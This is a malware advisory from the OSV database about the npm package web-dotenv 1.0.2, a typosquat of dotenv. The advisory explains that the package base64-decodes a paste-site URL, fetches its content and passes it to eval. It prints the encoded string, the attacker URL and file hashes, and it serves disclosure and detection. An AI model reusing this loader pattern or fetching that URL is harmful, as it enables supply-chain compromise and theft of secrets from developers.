MAL-2026-4728

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/web-dotenv/MAL-2026-4728.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4728

Published

2026-05-25T15:07:03Z

Modified

2026-05-26T06:03:07.422628105Z

Summary

Malicious code in web-dotenv (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (edd19476eeb1c31707abe6fac6f52dbd1950a0dc25f4854ea5269d6400f8ea37)

web-dotenv impersonates the widely-used dotenv package: its package.json copies dotenv's repository (git://github.com/motdotla/dotenv.git) and homepage (github.com/motdotla/dotenv#readme), and the source is otherwise a verbatim copy of dotenv with one injected function. The package's primary documented entry point, config(), calls configfix() in lib/main.js, which base64-decodes the string CWh0dHBzOi8vd3d3Lmpzb25rZWVwZXIuY29tL2IvVktVTkk= to https://www.jsonkeeper.com/b/VKUNI, fetches that URL via axios, and passes the response body directly to eval. jsonkeeper.com is an anonymous, mutable paste host: the attacker can swap the executed JavaScript at any time without republishing the package. Any project that installs web-dotenv expecting dotenv-compatible behavior and calls .config() (i.e., the normal first line of any dotenv consumer) will execute attacker-controlled code in the Node process, with full access to environment variables, filesystem, and outbound network. Three independent attack signals stack: typosquat of a top-tier package, base64-obfuscated URL, and remote eval of mutable third-party content.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "edd19476eeb1c31707abe6fac6f52dbd1950a0dc25f4854ea5269d6400f8ea37",
            "modified_time": "2026-05-25T15:07:03Z",
            "id": "IN-MAL-2026-004695",
            "import_time": "2026-05-26T05:53:06.279609533Z",
            "versions": [
                "1.0.2"
            ],
            "source": "amazon-inspector"
        }
    ]
}

References

https://www.npmjs.com/package/web-dotenv/v/1.0.2

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / web-dotenv

Package

Name: web-dotenv; View open source insights on deps.dev
Purl: pkg:npm/web-dotenv

Affected ranges

Affected versions

1.*

1.0.2

Database specific

indicators

{
    "package_integrity": [
        {
            "hashes": {
                "sha1": "00765d9332c9419680fe81949c2c55594fbb3c87",
                "sha512_sri": "sha512-mwwJes5qK/gDhbP3K67Xo6EIhTZlmX5vECr+TGuNOJfjMkvLgWF/aSPSfYZ+sfGmpSFq9VnlU3XE5oXDsEEPeg=="
            },
            "filename": "web-dotenv-1.0.2.tgz"
        }
    ],
    "evidence_files": [
        {
            "path": "lib/main.js",
            "sha256": "5cc30e2db46bb70e043b5f7fdb2d526caa2a4fcf83806c1c08bd6f0a1559ef43",
            "tlsh": "99427204a9f9761207c3b2d2914f5019a9bac267361c9f807a8cb3d86f49e78c5e37dd"
        },
        {
            "path": "package.json",
            "sha256": "58c62d717274f3b0970a51f4b58ee6f2cfac574693790cd24f4984763bebd312",
            "tlsh": "6e31cb12c48c1d6329c67e6eb86d860296a4d61bed58bd0d338a23cd4f5d27f40fa35d"
        }
    ]
}

cwes

[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/web-dotenv/MAL-2026-4728.json"